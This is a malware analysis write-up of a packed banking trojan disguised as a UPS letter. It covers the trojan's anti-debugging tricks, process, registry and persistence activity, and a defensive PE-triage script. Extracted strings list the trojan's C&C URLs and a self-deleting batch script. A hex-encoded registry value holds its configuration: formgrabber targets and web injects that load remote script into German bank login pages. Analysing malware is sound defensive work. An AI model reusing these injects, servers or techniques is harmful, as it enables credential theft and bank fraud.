Analysis of the malware d13c9136a5c29c47aa4c750fd7b34863. If you feel like watching Pulp Fiction while reading, yeah, this is related to the fact that I did not follow a strict chronological order. Some parts are in chronological order while some are not. Some information is still missing; I'll add it later. Nevertheless, feel free to contact me :)
% md5sum UPS_COLLECT_LETTER_N882342545.exe
d13c9136a5c29c47aa4c750fd7b34863 UPS_COLLECT_LETTER_N882342545.exe
% file UPS_COLLECT_LETTER_N882342545.exe
UPS_COLLECT_LETTER_N882342545.exe: PE32 executable (GUI) Intel 80386, for MS Windows
% clamscan UPS_COLLECT_LETTER_N882342545.exe
UPS_COLLECT_LETTER_N882342545.exe: W32.Trojan.Yakes-23 FOUND
There is no visible .text section, but the binary contains two .data sections. The first of them is the real code section: AddressOfEntryPoint points into it, which is the first hint that the file is packed.
The malware uses several anti-debugging tricks to hamper debugging and unpacking. After start it spawns three threads; one of them raises exceptions and is sprinkled with INT 3 and INT 2D instructions. Both behave differently with a debugger attached (the debugger swallows the exception instead of the program's own handler seeing it), so the unpacking stub can tell that it is being traced.
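A small check that automates the two observations above, as an added example (not code from the original post): it parses the PE section table by hand, finds the section that contains AddressOfEntryPoint, flags an entry point that lies outside .text or in a writable section, and counts the INT 3 (CC) and INT 2D (CD 2D) encodings in that section. The PE image it runs on is constructed in memory to mimic the described layout (no .text, two .data sections); it is not the sample, and the opcode count is a rough heuristic because CC and CD 2D also occur as ordinary data bytes.

```python
"""Locate the section holding the PE entry point and count INT 3 / INT 2D in it."""
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def _pe_offset(pe: bytes) -> int:
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    return e_lfanew


def sections(pe: bytes):
    """Yield (name, VirtualAddress, VirtualSize, PointerToRawData, SizeOfRawData, Characteristics)."""
    nt = _pe_offset(pe)
    num_sections = struct.unpack_from("<H", pe, nt + 6)[0]
    opt_size = struct.unpack_from("<H", pe, nt + 20)[0]
    table = nt + 24 + opt_size                      # section table follows the optional header
    for i in range(num_sections):
        off = table + 40 * i
        name = pe[off:off + 8].rstrip(b"\0").decode("latin-1")
        vsize, va, rsize, roff = struct.unpack_from("<IIII", pe, off + 8)
        chars = struct.unpack_from("<I", pe, off + 36)[0]
        yield name, va, vsize, roff, rsize, chars


def entry_point_rva(pe: bytes) -> int:
    # AddressOfEntryPoint sits at offset 16 of the optional header
    return struct.unpack_from("<I", pe, _pe_offset(pe) + 24 + 16)[0]


def entry_section(pe: bytes):
    ep = entry_point_rva(pe)
    for sec in sections(pe):
        _, va, vsize, _, rsize, _ = sec
        if va <= ep < va + max(vsize, rsize):
            return sec
    return None


def count_debug_traps(code: bytes) -> dict:
    """Crude count of INT 3 (CC) and INT 2D (CD 2D); CC also shows up as padding/data."""
    return {"int3": code.count(b"\xCC"), "int2d": code.count(b"\xCD\x2D")}


def triage(pe: bytes) -> dict:
    sec = entry_section(pe)
    if sec is None:
        return {"entry_section": None, "suspicious": True}
    name, _, _, roff, rsize, chars = sec
    result = {
        "entry_section": name,
        "executable": bool(chars & (IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE)),
        "writable": bool(chars & IMAGE_SCN_MEM_WRITE),
        # entry point outside .text or in a writable section: the layout the post describes
        "suspicious": name != ".text" or bool(chars & IMAGE_SCN_MEM_WRITE),
    }
    result.update(count_debug_traps(pe[roff:roff + rsize]))
    return result


def build_sample_pe() -> bytes:
    """Constructed PE32 image (not the real sample): no .text, two .data sections,
    entry point in the first one, a few INT 3 / INT 2D opcodes in the code."""
    # push ebp; mov ebp,esp; int3 x3; int 2Dh x2; ret
    code = b"\x55\x8B\xEC" + b"\xCC" * 3 + b"\xCD\x2D" * 2 + b"\xC3"
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)           # e_lfanew = 0x40
    # Magic, linker ver, SizeOfCode, SizeOfInitData, SizeOfUninitData, EntryPoint, BaseOfCode, BaseOfData
    opt = struct.pack("<HBBIIIIII", 0x10B, 0, 0, len(code), 0, 0, 0x1000, 0x1000, 0x2000)
    opt += struct.pack("<I", 0x400000)                            # ImageBase
    opt = opt.ljust(224, b"\0")                                   # PE32 optional header size
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, len(opt), 0x0102)

    def sec(name, va, vsize, roff, rsize, chars):
        return struct.pack("<8sIIIIIIHHI", name, vsize, va, rsize, roff, 0, 0, 0, 0, chars)

    rw = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    hdr = dos + coff + opt
    hdr += sec(b".data", 0x1000, len(code), 0x200, 0x200, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | rw)
    hdr += sec(b".data", 0x2000, 0x200, 0x400, 0x200, 0x40 | rw)  # 0x40 = INITIALIZED_DATA
    return hdr.ljust(0x200, b"\0") + code.ljust(0x200, b"\0") + b"\0" * 0x200


if __name__ == "__main__":
    print(triage(build_sample_pe()))
```

Run it against a real file with `triage(open(path, "rb").read())`; a clean compiler-built binary gives entry_section ".text" and writable False.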
Dependency Walker shows nothing promising: only kernel32.dll and ole32.dll are imported. This is where the static and dynamic pictures differ (see the Maltrap log below): the real imports are resolved at run time.
With help from mort (Thanks, man!), who provided the first dump, I have also been able to dump the unpacked executable using Maltrap and *IDA Pro Free 5.0*. Maltrap shows what happens after the executable is unpacked. Using IDA and setting a breakpoint on GetVolumeInformationW, I have been able to dump the process (LordPE to the rescue).
PID: 464, All hooks are now in place!
PID: 464, 0x7C801DA8: LoadLibraryA/ExA(file: shlwapi, flags: 00000000)
PID: 464, 0x00402290: LoadLibraryW(shlwapi)
PID: 464, 0x7C801DA8: LoadLibraryA/ExA(file: gfjhgfbvmnbvkfjhgf, flags: 00000000)
PID: 464, 0x7C801DA8: LoadLibraryA/ExA(file: shlwapi, flags: 00000000)
PID: 464, 0x77E8C9B6: RegOpenKeyExW(key: HKEY_LOCAL_MACHINE, subkey: Software\Microsoft\Rpc\PagedBuffers) -> FAIL
PID: 464, 0x77E8C7CE: RegOpenKeyExA(key: HKEY_LOCAL_MACHINE, subkey: Software\Microsoft\Rpc) -> SUCCESS
PID: 464, --- handle: 00000098
PID: 464, 0x77E8C885: RegOpenKeyExW(key: HKEY_LOCAL_MACHINE, subkey: Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KB00925890.exe\RpcThreadPoolThrottle) -> FAIL
PID: 464, 0x77E8CFF1: RegOpenKeyExW(key: HKEY_LOCAL_MACHINE, subkey: Software\Policies\Microsoft\Windows NT\Rpc) -> FAIL
PID: 464, 0x77E8C735: LoadLibraryW(rpcrt4.dll)
PID: 464, 0x77E84B92: CreateFileW(file: \\.\PIPE\lsarpc, OPEN_EXISTING)
PID: 464, -- CreateFileW result - fHandle: 000000BC
PID: 464, 0x0040BAFC: GetVolumeInformationW(root: C:\) -> SUCCESS
[...]
Dumping the unpacked executable from the running process reveals more:
% md5sum dumped.exe
790f602efc687586df63939e1b7edd3d dumped.exe
% file dumped.exe
dumped.exe: PE32 executable (GUI) Intel 80386, for MS Windows
% clamscan dumped.exe
dumped.exe: OK
The malware uses the following DLLs:
PEiD's KANAL plugin finds RC4 and SHA constants in the dump (a signature match, not proof of how they are used).
The binary contains quite a few interesting strings:
The raw batch script that deletes the original dropper (the %S placeholders are filled in with the file path at run time; this is the cmd.exe child process seen in the CaptureBAT log further down):
000000011E10 000000411E10 0 @echo off
000000011E1F 000000411E1F 0 del /F /Q /A "%S"
000000011E32 000000411E32 0 if exist "%S" goto R
000000011E48 000000411E48 0 del /F /Q /A "%S"
The IP addresses of the C&C servers
000000011410 000000411410 0 http://113.130.65.77:8080/mx5/C/in/
000000011458 000000411458 0 http://199.71.212.78:8080/mx5/C/in/
0000000114A0 0000004114A0 0 http://211.191.168.98:8080/mx5/C/in/
0000000114F0 0000004114F0 0 http://195.250.139.10:8080/mx5/C/in/
000000011540 000000411540 0 http://173.224.208.60:8080/mx5/C/in/
000000011590 000000411590 0 http://46.51.218.71:8080/mx5/C/in/
0000000115D8 0000004115D8 0 http://89.97.55.33:8080/mx5/C/in/
000000011620 000000411620 0 http://71.89.140.153:8080/mx5/C/in/
000000011668 000000411668 0 http://195.111.72.46:8080/mx5/C/in/
0000000116B0 0000004116B0 0 http://84.53.217.109:8080/mx5/C/in/
0000000116F8 0000004116F8 0 http://78.46.64.17:8080/mx5/C/in/
Some XML templates used to store and submit credentials, plus POP3 commands:
000000011774 000000411774 0 application/x-www-form-urlencoded
000000011798 000000411798 0
USER PASS
Misc interesting information
0000000111F8 0000004111F8 0 Software\Microsoft\Windows NT\C%08X
000000011254 000000411254 0 Mozilla\Firefox\Profiles
000000011288 000000411288 0 cookies.*
00000001129C 00000041129C 0 Macromedia
0000000112BC 0000004112BC 0 firefox.exe
0000000112D4 0000004112D4 0 explorer.exe
000000011C60 000000411C60 0 Software\Microsoft\Windows NT\S%08X
000000011CEB 000000411CEB 0 sKB%08d.exe
000000011D08 000000411D08 0 Software\Microsoft\Windows\CurrentVersion\Run
The C%08X and S%08X key names are format strings: they match the two keys RegShot later sees created under Software\Microsoft\Windows NT (C70C7138C and S125D0261), and KB%08d.exe is the naming pattern of the dropped copy KB00925890.exe. The Firefox profile, cookies.* and Macromedia (Flash local storage) strings suggest credential and cookie theft, the Run key persistence.
Process Explorer showed the following new processes on the system:

This was also seen by CaptureBAT:
"06/8/2012 14:11:6.349","process","created","C:\WINDOWS\explorer.exe","C:\Documents and Settings\xxx\Desktop\mw\UPS_COLLECT_LETTER_N882342545.exe"
"06/8/2012 14:11:8.612","process","created","C:\Documents and Settings\xxx\Desktop\mw\UPS_COLLECT_LETTER_N882342545.exe","C:\WINDOWS\system32\cmd.exe"
"06/8/2012 14:11:8.622","process","created","C:\Documents and Settings\xxx\Desktop\mw\UPS_COLLECT_LETTER_N882342545.exe","C:\Documents and Settings\xxx\Application Data\KB00925890.exe"
"06/8/2012 14:11:10.4","process","terminated","C:\Documents and Settings\xxx\Desktop\mw\UPS_COLLECT_LETTER_N882342545.exe","C:\WINDOWS\system32\cmd.exe"
"06/8/2012 14:11:10.915","process","terminated","C:\Documents and Settings\xxx\Desktop\mw\UPS_COLLECT_LETTER_N882342545.exe","C:\Documents and Settings\xxx\Application Data\KB00925890.exe"
A quick look at the dropped file:
% file KB00925890.exe
KB00925890.exe: PE32 executable (GUI) Intel 80386, for MS Windows
% md5sum KB00925890.exe
d13c9136a5c29c47aa4c750fd7b34863 KB00925890.exe
% clamscan KB00925890.exe
KB00925890.exe: W32.Trojan.Yakes-23 FOUND
----------- SCAN SUMMARY -----------
Known viruses: 1278806
Engine version: 0.97.5
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.07 MB
Data read: 0.07 MB (ratio 1.00:1)
Time: 2.905 sec (0 m 2 s)
It is just a copy of the malware saved under C:\Documents and Settings\xxx\Application Data\KB00925890.exe.
I used RegShot and CaptureBAT to record registry activity. First, the results from RegShot, which are not as useful as I had hoped.
Regshot 1.8.3-beta1V5
Comments:
Datetime:2012/7/31 07:15:01 , 2012/7/31 07:17:27
Computer:WINVM , WINVM
Username: ,
----------------------------------
Keys added:2
----------------------------------
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows NT\C70C7138C
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows NT\S125D0261
----------------------------------
Values added:9
----------------------------------
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\MS-DOS Emulation\DisplayParams: 40 01 00 00 F0 00 00 00 00 05 00 00 00 04 00 00 60 00 00 00 60 00 00 00 24 00 00 00 24 00 00 00 20 00 00 00 4C 00 75 00 63 00 69 00 64 00 61 00 20 00 43 00 6F 00 6E 00 73 00 6F 00 6C 00 65 00 00 00 0F 00 00 D8 9D 7C A0 F8 B6 00 1E 79 DD 77 94 F8 B6 00 36 9E 41 7E 08 C9 42 7E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 C4 F8 B6 00 EC EF A7 7C 01 00 00 80 00 D8 9D 7C 00 00 00 00 19 00 02 00 C0 F8 B6 00 A4 03 00 00 00 00 00 00 D8 F8 B6 00 66 F0 A7 7C 01 00 00 80 A8 63 BD 7C C8 63 BD 7C
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\efpujnemxbcs\Qrfxgbc\Znyjner\HCF_PBYYRPG_YRGGRE_A882342545.rkr: 0D 00 00 00 06 00 00 00 80 1B 2F 79 EC 6E CD 01
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline: 0x00000000
Sets IE to online mode (GlobalUserOffline = 0)
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Run\KB00925890.exe: ""C:\Documents and Settings\xxx\Application Data\KB00925890.exe""
Malware copy is added to autostart
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached{513D916F-2A8E-4F51-AEAB-0CBC76FB1AF8} {000214E8-0000-0000-C000-000000000046} 0x401: 01 00 00 00 35 00 37 00 20 5E AC 4A EC 6E CD 01
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\xxx\Desktop\Malware\UPSCOLLECTLETTERN882342545.exe: "UPSCOLLECTLETTERN882342545"
The S125D0261 value is the bot's configuration: the bytes decode to an XML document (<settings hash=...> with httpshots, formgrabber, bconnect and httpinjects sections; the hex continues over the following lines)
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows NT\S125D0261: 3C 73 65 74 74 69 6E 67 73 20 68 61 73 68 3D 22 65 35 37 66 64 38 65 66 35 65 39 33 33 36 34 34 30 36 38 39 31 37 34 35 35 35 61 33 32 31 62 63 37 36 38 35 35 65 62 31 22 3E 3C 68 74 74 70 73 68 6F 74 73 3E 3C 75 72 6C 20 74 79 70 65 3D 22 64 65 6E 79 22 20 6F 6E 67 65 74 3D 22 31 22 20 6F 6E 70 6F 73 74 3D 22 31 22 3E 5C 2E 28 67 69 66 7C 70 6E 67 7C 6A 70 67 7C 63 73 73 7C 73 77 66 7C 69 63 6F 7C 6A 73 29 28 24 7C 5C 3F 29 3C 2F 75 72 6C 3E 3C 75 72 6C 20 74 79 70 65 3D 22 64 65 6E 79 22 20 6F 6E 67 65 74 3D 22 31 22 20 6F 6E 70 6F 73 74 3D 22 31 22 3E 77 65 62 72 65 73 6F 75 72 63 65 5C 2E 61 78 64 3C 2F 75 72 6C 3E 3C 2F 68 74 74 70 73 68 6F 74 73 3E 3C 66 6F 72 6D 67 72 61 62 62 65 72 3E 3C 75 72 6C 20 74 79 70 65 3D 22 61 6C 6C 6F 77 22 3E 61 6F 6C 2E 63 6F 6D 2F 2E 2A 2F 6C 6F 67 69 6E 2F 3C 2F 75 72 6C 3E 3C 75 72 6C 20 74 79 70 65 3D 22 61 6C 6C 6F 77 22 3E 61 63 63 6F 75 6E 74 73 2E 67 6F 6F 67 6C 65 2E 63 6F 6D 2F 53 65 72 76 69 63 65 4C 6F 67 69 6E 2F 3C 2F 75 72 6C 3E 3C 75 72 6C 20 74 79 70 65 3D 22 61 6C 6C 6F 77 22 3E 6C 6F 67 69 6E 2E 79 61 68 6F 6F 2E 63 6F 6D 2F 3C 2F 75 72 6C 3E 3C 75 72 6C 20 74 79 70 65 3D 22 61 6C 6C 6F 77 22 3E 62 61 64 6F 6F 2E 63 6F 6D 2F 73 69 67 6E 69 6E 2F 3C 2F 75 72 
6C 3E 3C 75 72 6C 20 74 79 70 65 3D 22 61 6C 6C 6F 77 22 3E 6C 6F 67 69 6E 5C 2E 6C 69 76 65 5C 2E 63 6F 6D 3C 2F 75 72 6C 3E 3C 75 72 6C 20 74 79 70 65 3D 22 64 65 6E 79 22 3E 61 6F 6C 5C 2E 63 6F 6D 3C 2F 75 72 6C 3E 3C 75 72 6C 20 74 79 70 65 3D 22 64 65 6E 79 22 3E 66 61 63 65 62 6F 6F 6B 5C 2E 63 6F 6D 3C 2F 75 72 6C 3E 3C 75 72 6C 20 74 79 70 65 3D 22 64 65 6E 79 22 3E 67 6F 6F 67 6C 65 5C 2E 63 6F 6D 3C 2F 75 72 6C 3E 3C 75 72 6C 20 74 79 70 65 3D 22 64 65 6E 79 22 3E 79 61 68 6F 6F 5C 2E 63 6F 6D 3C 2F 75 72 6C 3E 3C 75 72 6C 20 74 79 70 65 3D 22 64 65 6E 79 22 3E 62 61 64 6F 6F 5C 2E 63 6F 6D 3C 2F 75 72 6C 3E 3C 75 72 6C 20 74 79 70 65 3D 22 64 65 6E 79 22 3E 6C 69 76 65 5C 2E 63 6F 6D 3C 2F 75 72 6C 3E 3C 75 72 6C 20 74 79 70 65 3D 22 64 65 6E 79 22 3E 74 77 69 74 74 65 72 5C 2E 63 6F 6D 3C 2F 75 72 6C 3E 3C 75 72 6C 20 74 79 70 65 3D 22 64 65 6E 79 22 3E 76 6B 5C 2E 63 6F 6D 3C 2F 75 72 6C 3E 3C 75 72 6C 20 74 79 70 65 3D 22 61 6C 6C 6F 77 22 3E 2E 2A 3C 2F 75 72 6C 3E 3C 2F 66 6F 72 6D 67 72 61 62 62 65 72 3E 3C 72 65 64 69 72 65 63 74 73 3E 3C 72 65 64 69 72 65 63 74 3E 3C 70 61 74 74 65 72 6E 3E 6A 71 75 65 72 79 61 64 64 6F 6E 73 76 32 5C 2E 6A 73 3C 2F 70 61 74 74 65 72 6E 3E 3C 70 72 6F 63 65 73 73 2F 3E 3C 2F 72 65 64 69 72 65 63 74 3E 3C 2F 72 65 64 69 72 65 63 74 73 3E 3C 62 63 6F 6E 6E 65 63 74 3E 33 31 2E 31 38 34 2E 31 39 32 2E 31 39 35 3A 38 30 38 30 3C 2F 62 63 6F 6E 6E 65 63 74 3E 3C 68 74 74 70 69 6E 6A 65 63 74 73 3E 3C 68 74 74 70 69 6E 6A 65 63 74 3E 3C 63 6F 6E 64 69 74 69 6F 6E 73 3E 3C 75 72 6C 20 74 79 70 65 3D 22 61 6C 6C 6F 77 22 20 6F 6E 70 6F 73 74 3D 22 31 22 20 6F 6E 67 65 74 3D 22 31 22 3E 2E 2A 62 61 6E 6B 69 6E 67 2E 70 6F 73 74 62 61 6E 6B 2E 64 65 2F 72 61 69 2F 6C 6F 67 69 2E 2A 3C 2F 75 72 6C 3E 3C 2F 63 6F 6E 64 69 74 69 6F 6E 73 3E 3C 61 63 74 69 6F 6E 73 3E 3C 6D 6F 64 69 66 79 3E 3C 70 61 74 74 65 72 6E 3E 3C 21 5B 43 44 41 54 41 5B 28 5B 5C 78 30 30 5D 2A 3F 29 3C 2F 68 65 61 64 3E 5D 5D 3E 3C 2F 70 61 74 74 65 
72 6E 3E 3C 72 65 70 6C 61 63 65 6D 65 6E 74 3E 3C 21 5B 43 44 41 54 41 5B 3C 73 63 72 69 70 74 3E 0A 69 66 28 21 77 69 6E 64 6F 77 2E 6A 51 75 65 72 79 29 7B 0A 09 64 6F 63 75 6D 65 6E 74 2E 77 72 69 74 65 28 27 3C 73 63 72 27 2B 27 69 70 74 20 73 72 63 3D 22 68 74 74 70 73 3A 2F 2F 61 6A 61 78 2E 67 6F 6F 67 6C 65 61 70 69 73 2E 63 6F 6D 2F 61 6A 61 78 2F 6C 69 62 73 2F 6A 71 75 65 72 79 2F 31 2E 37 2E 31 2F 6A 71 75 65 72 79 2E 6D 69 6E 2E 6A 73 22 3E 3C 2F 73 63 72 27 2B 27 69 70 74 3E 27 29 3B 0A 7D 0A 3C 2F 73 63 72 69 70 74 3E 0A 3C 73 63 72 69 70 74 3E 0A 64 6F 63 75 6D 65 6E 74 2E 77 72 69 74 65 28 27 3C 73 63 72 69 70 74 20 74 79 70 65 3D 22 74 65 78 74 2F 6A 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3D 22 68 74 74 70 73 3A 2F 2F 74 72 61 6E 7A 61 73 65 63 75 72 65 2E 63 6F 6D 2F 72 65 73 6F 75 72 63 65 73 2F 73 63 72 69 70 74 2F 67 65 74 2E 70 68 70 2F 64 65 6E 65 77 2F 3F 6E 61 6D 65 3D 64 65 5F 70 6F 73 74 62 61 6E 6B 5F 6C 6F 67 69 6E 34 2E 6A 73 26 6C 6F 63 61 6C 3D 27 2B 6E 65 77 20 44 61 74 65 28 29 2E 67 65 74 54 69 6D 65 28 29 2E 74 6F 53 74 72 69 6E 67 28 29 2B 27 22 3E 3C 2F 73 63 72 27 2B 27 69 70 74 3E 27 29 3B 0A 3C 2F 73 63 72 69 70 74 3E 5D 5D 3E 3C 2F 72 65 70 6C 61 63 65 6D 65 6E 74 3E 3C 2F 6D 6F 64 69 66 79 3E 3C 2F 61 63 74 69 6F 6E 73 3E 3C 2F 68 74 74 70 69 6E 6A 65 63 74 3E 3C 68 74 74 70 69 6E 6A 65 63 74 3E 3C 63 6F 6E 64 69 74 69 6F 6E 73 3E 3C 75 72 6C 20 74 79 70 65 3D 22 61 6C 6C 6F 77 22 20 6F 6E 70 6F 73 74 3D 22 31 22 20 6F 6E 67 65 74 3D 22 31 22 3E 2E 2A 66 69 6E 61 6E 7A 70 6F 72 74 61 6C 2E 66 69 64 75 63 69 61 2E 64 65 2F 2E 2A 2F 65 6E 74 72 79 2E 2A 72 7A 69 64 3D 58 43 2E 2A 72 7A 62 6B 3D 2E 2A 3C 2F 75 72 6C 3E 3C 75 72 6C 20 74 79 70 65 3D 22 61 6C 6C 6F 77 22 20 6F 6E 70 6F 73 74 3D 22 31 22 20 6F 6E 67 65 74 3D 22 31 22 3E 2E 2A 66 69 6E 61 6E 7A 70 6F 72 74 61 6C 2E 66 69 64 75 63 69 61 2E 64 65 2F 2E 2A 2F 70 6F 72 74 61 6C 2E 2A 3C 2F 75 72 6C 3E 3C 2F 63 6F 6E 64 69 74 69 6F 6E 73 3E 3C 61 63 74 69 6F 6E 
73 3E 3C 6D 6F 64 69 66 79 3E 3C 70 61 74 74 65 72 6E 3E 3C 21 5B 43 44 41 54 41 5B 28 5B 5C 78 30 30 5D 2A 3F 29 3C 2F 68 65 61 64 3E 5D 5D 3E 3C 2F 70 61 74 74 65 72 6E 3E 3C 72 65 70 6C 61 63 65 6D 65 6E 74 3E 3C 21 5B 43 44 41 54 41 5B 3C 73 74 79 6C 65 20 74 79 70 65 3D 22 74 65 78 74 2F 63 73 73 22 3E 0A 3C 2F 73 74 79 6C 65 3E 0A 3C 73 63 72 69 70 74 20 74 79 70 65 3D 22 74 65 78 74 2F 6A 61 76 61 73 63 72 69 70 74 22 3E 0A 69 66 20 28 21 77 69 6E 64 6F 77 2E 6A 51 75 65 72 79 29 7B 0A 09 64 6F 63 75 6D 65 6E 74 2E 77 72 69 74 65 28 27 3C 73 63 72 27 20 2B 20 27 69 70 74 20 73 72 63 3D 22 68 74 74 70 73 3A 2F 2F 61 6A 61 78 2E 67 6F 6F 67 6C 65 61 70 69 73 2E 63 6F 6D 2F 61 6A 61 78 2F 6C 69 62 73 2F 6A 71 75 65 72 79 2F 31 2E 37 2E 32 2F 6A 71 75 65 72 79 2E 6D 69 6E 2E 6A 73 22 3E 3C 2F 73 63 72 27 20 2B 20 27 69 70 74 3E 27 29 3B 0A 7D 0A 3C 2F 73 63 72 69 70 74 3E 0A 3C 73 63 72 69 70 74 3E 0A 64 6F 63 75 6D 65 6E 74 2E 77 72 69 74 65 28 27 3C 73 63 72 69 70 74 20 74 79 70 65 3D 22 74 65 78 74 2F 6A 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3D 22 68 74 74 70 73 3A 2F 2F 74 72 61 6E 7A 61 73 65 63 75 72 65 2E 63 6F 6D 2F 72 65 73 6F 75 72 63 65 73 2F 73 63 72 69 70 74 2F 67 65 74 2E 70 68 70 2F 64 65 6E 65 77 2F 3F 6E 61 6D 65 3D 64 65 5F 66 69 64 75 63 69 61 5F 6C 6F 67 69 6E 34 2E 6A 73 26 6C 6F 63 61 6C 3D 27 2B 6E 65 77 20 44 61 74 65 28 29 2E 67 65 74 54 69 6D 65 28 29 2E 74 6F 53 74 72 69 6E 67 28 29 2B 27 22 3E 3C 2F 73 63 72 27 2B 27 69 70 74 3E 27 29 3B 0A 3C 2F 73 63 72 69 70 74 3E 5D 5D 3E 3C 2F 72 65 70 6C 61 63 65 6D 65 6E 74 3E 3C 2F 6D 6F 64 69 66 79 3E 3C 2F 61 63 74 69 6F 6E 73 3E 3C 2F 68 74 74 70 69 6E 6A 65 63 74 3E 3C 2F 68 74 74 70 69 6E 6A 65 63 74 73 3E 3C 2F 73 65 74 74 69 6E 67 73 3E HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Sysinternals\Process Monitor\FilterDialog: 2C 00 00 00 00 00 00 00 01 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 4B 00 00 00 7F 00 00 00 50 03 00 00 DC 02 00 00 
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Sysinternals\Process Monitor\FilterControlColumns: 64 00 00 00 64 00 00 00 64 00 00 00 64 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00
----------------------------------
Values modified:17
----------------------------------
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{5E6AB780-7743-11CF-A12B-00AA004AE837}\Count\HRZR_HVGBBYONE: 07 00 00 00 2B 00 00 00 F0 AE 6D 0A EC 6E CD 01
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{5E6AB780-7743-11CF-A12B-00AA004AE837}\Count\HRZR_HVGBBYONE: 08 00 00 00 2C 00 00 00 D0 37 09 42 EC 6E CD 01
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{5E6AB780-7743-11CF-A12B-00AA004AE837}\Count\HRZR_HVGBBYONE:0k1,120: 07 00 00 00 20 00 00 00 F0 AE 6D 0A EC 6E CD 01
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{5E6AB780-7743-11CF-A12B-00AA004AE837}\Count\HRZR_HVGBBYONE:0k1,120: 08 00 00 00 21 00 00 00 D0 37 09 42 EC 6E CD 01
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 0D 00 00 00 59 00 00 00 D0 C1 23 25 EC 6E CD 01
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 0D 00 00 00 5A 00 00 00 80 1B 2F 79 EC 6E CD 01
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 0E 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 60 19 08 08 AA DC CA 01 01 00 00 00 0A 00 02 0F 00 00 00 00 00 00 00 00
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 11 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 60 19 08 08 AA DC CA 01 01 00 00 00 0A 00 02 0F 00 00 00 00 00 00 00 00
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 01 00 00 00 03 00 00 00 04 00 00 00 05 00 00 00 00 00 00 00 02 00 00 00 FF FF FF FF
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 04 00 00 00 01 00 00 00 03 00 00 00 05 00 00 00 00 00 00 00 02 00 00 00 FF FF FF FF
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1\MRUListEx: 03 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 02 00 00 00 FF FF FF FF
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1\MRUListEx: 04 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00 02 00 00 00 FF FF FF FF
